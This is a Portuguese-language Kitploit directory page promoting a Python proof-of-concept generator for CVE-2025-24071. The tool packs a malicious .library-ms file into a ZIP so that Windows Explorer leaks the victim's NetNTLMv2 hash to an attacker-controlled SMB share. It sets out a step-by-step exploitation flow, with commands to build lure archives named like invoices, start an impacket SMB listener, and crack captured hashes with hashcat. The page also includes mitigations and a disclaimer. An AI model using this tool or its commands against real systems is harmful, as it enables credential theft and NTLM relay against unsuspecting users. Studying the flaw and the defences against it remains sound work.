Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24071 — Gerador de PoC em Python sem dependências para CVE-2025-24071 que cria um arquivo .library-ms malicioso em um ZIP para acionar a divulgação de hash NTLM do Windows Explorer. | Kitploit
Ferramentas/GitHubGitHub/bardlaudian/cve-2025-24071
Ferramentas de PhishingAtaques de SenhaAnálise de VulnerabilidadesExploraçãoMovimento LateralColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubbardlaudian/cve-2025-24071

CVE-2025-24071

Gerador de PoC em Python sem dependências para CVE-2025-24071 que cria um arquivo .library-ms malicioso em um ZIP para acionar a divulgação de hash NTLM do Windows Explorer.

Ver Repositório
1há 2 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24071 — Spoofing do Windows File Explorer / Divulgação de Hash NTLM via .library-ms

Python CVE Platform

⚠️ Aviso Legal: Esta ferramenta destina-se apenas a fins educacionais e a testes de penetração autorizados. Utilize-a apenas contra sistemas que possui ou para os quais tem permissão escrita explícita para testar. O uso não autorizado é ilegal.


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Como Funciona
  • Requisitos
  • Instalação
  • Utilização
  • Exemplos
  • Mitigações
  • Créditos
  • Referências

Visão Geral

O Windows File Explorer analisa automaticamente determinados tipos de ficheiro assim que estes aparecem numa vista de pasta, sem qualquer interação do utilizador, como um duplo clique. As versões afetadas não validam corretamente os ficheiros .library-ms, que podem definir um conector de pesquisa apontando para um caminho SMB remoto arbitrário.

Quando o Explorer apresenta uma pasta que contém um ficheiro .library-ms malicioso (por exemplo, logo após extrair um arquivo ZIP/RAR), este tenta silenciosamente ligar-se ao caminho UNC controlado pelo atacante para resolver a localização da "biblioteca". Esta tentativa de ligação SMB transporta o hash NetNTLMv2 da vítima, que um atacante a capturar tráfego no host especificado (por exemplo, com impacket-smbserver ou Responder) pode depois tentar quebrar offline ou relayar.

Este repositório contém uma reescrita mínima e sem dependências de um gerador de PoC público para esta vulnerabilidade: constrói o ficheiro .library-ms malicioso e empacota-o num ZIP, utilizando apenas a biblioteca padrão do Python.


Detalhes da Vulnerabilidade


Como Funciona

Um ficheiro .library-ms é um documento XML que indica ao Windows Explorer para apresentar o conteúdo de uma localização remota ou local como uma "biblioteca". O seu elemento <simpleLocation><url> pode apontar para um caminho UNC (\\<host>\<share>).

Nas versões afetadas, o Explorer resolve esta localização assim que a pasta é apresentada — não é necessário um duplo clique ou uma ação explícita para além de ter o ficheiro visível numa vista de pasta (por exemplo, logo após extrair um arquivo que o contenha).

Requisitos do Ataque

  1. O atacante controla um host alcançável pela vítima (ou está na mesma rede) a executar um listener SMB (impacket-smbserver, Responder, etc.).
  2. É gerado um ficheiro .library-ms malicioso, apontando para \\<attacker_ip>\<share>.
  3. O ficheiro é entregue à vítima, tipicamente empacotado dentro de um arquivo ZIP/RAR (este repositório automatiza esse passo de empacotamento).
  4. A vítima extrai o arquivo e visualiza a pasta no Explorer — não é necessária mais interação.

Fluxo de Exploração

root@kitploit:~
1. Start an SMB listener on the attacker machine
2. Generate a .library-ms file pointing to \\<attacker_ip>\<share>
3. Package it into a ZIP archive
4. Deliver the ZIP to the victim (upload feature, email, share, etc.)
5. Victim extracts the ZIP and Explorer renders the folder
6. Explorer resolves the UNC path -> SMB auth attempt -> NetNTLMv2 hash captured
7. Crack the hash offline (hashcat -m 5600) or relay it

Requisitos

  • Python 3.8+ (apenas biblioteca padrão — os, sys, argparse, zipfile)

Não são necessárias dependências de terceiros para gerar o payload. A captura do hash requer um listener SMB como o Impacket (impacket-smbserver) ou o Responder do lado do atacante.


Instalação

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2025-24071.git
cd CVE-2025-24071

Utilização

root@kitploit:~
usage: cve_2025_24071.py [-h] [-n NAME] [-i IP] [-s SHARE] [-o OUTDIR] [-a]

options:
  -n NAME, --name NAME             Output base filename (no extension)
  -i IP, --ip IP                   Attacker IP to embed as the UNC path target
  -s SHARE, --share SHARE          Share name (default: shared)
  -o OUTDIR, --outdir OUTDIR       Output directory (default: current dir)
  -a, --affected-versions          Print the list of affected Windows versions and exit

Exemplos

Utilização básica

root@kitploit:~
python3 cve_2025_24071.py -n invoice -i 10.10.14.5

Isto produz invoice.zip, contendo invoice.library-ms a apontar para \\10.10.14.5\shared.

Iniciar o listener antes de entregar o ficheiro

root@kitploit:~
impacket-smbserver shared /tmp/smbshare -smb2support

Nome de partilha e diretório de saída personalizados

root@kitploit:~
python3 cve_2025_24071.py -n report -i 10.10.14.5 -s data -o ./payloads

Listar versões afetadas

root@kitploit:~
python3 cve_2025_24071.py -a

Mitigações

  • Aplicar a atualização de segurança cumulativa de março de 2025 (ou posterior) para a sua versão do Windows.
  • Restringir o SMB de saída (TCP 445) no perímetro da rede para impedir que os hashes NTLM sejam divulgados para hosts externos.
  • Impor a assinatura SMB e desativar o NTLM sempre que possível em favor do Kerberos.
  • Analisar os arquivos carregados/extraídos à procura de .library-ms e tipos de ficheiro semelhantes analisados automaticamente antes de chegarem às estações de trabalho dos utilizadores finais.

Créditos

  • Vulnerabilidade descoberta e reportada à Microsoft por: Microsoft (creditada via MSRC; o reportante externo original não foi divulgado publicamente no momento da redação)
  • Aviso publicado por: Microsoft Security Response Center (MSRC)
  • Conceito de gerador de PoC público referenciado de: ThemeHackers
  • Reescrita com biblioteca padrão: Bardlaudian — versão sem dependências do gerador de ZIP/.library-ms, sem nova técnica de exploração

Referências

  • MSRC — CVE-2025-24071 Security Update Guide
  • NVD — CVE-2025-24071
  • CVE.org Record — CVE-2025-24071
  • GitHub Advisory Database — GHSA-mppc-8qxh-4wjw
Baixar ferramenta
CampoValor
CVECVE-2025-24071
AfetadoWindows 10 (1607–22H2), Windows 11 (22H2–24H2), Windows Server 2012 R2 – 2025
TipoExposição de Informação Sensível a um Ator Não Autorizado (CWE-200)
PrivilégiosNenhum (atacante não autenticado; requer que a vítima visualize/extraia o ficheiro)
ImpactoDivulgação de hash NetNTLMv2 → quebra offline ou relay NTLM
CVSS7.5 Alto (segundo o GitHub Advisory Database) / 6.5 (base MSRC)
CorreçãoAtualizações cumulativas do Patch Tuesday de março de 2025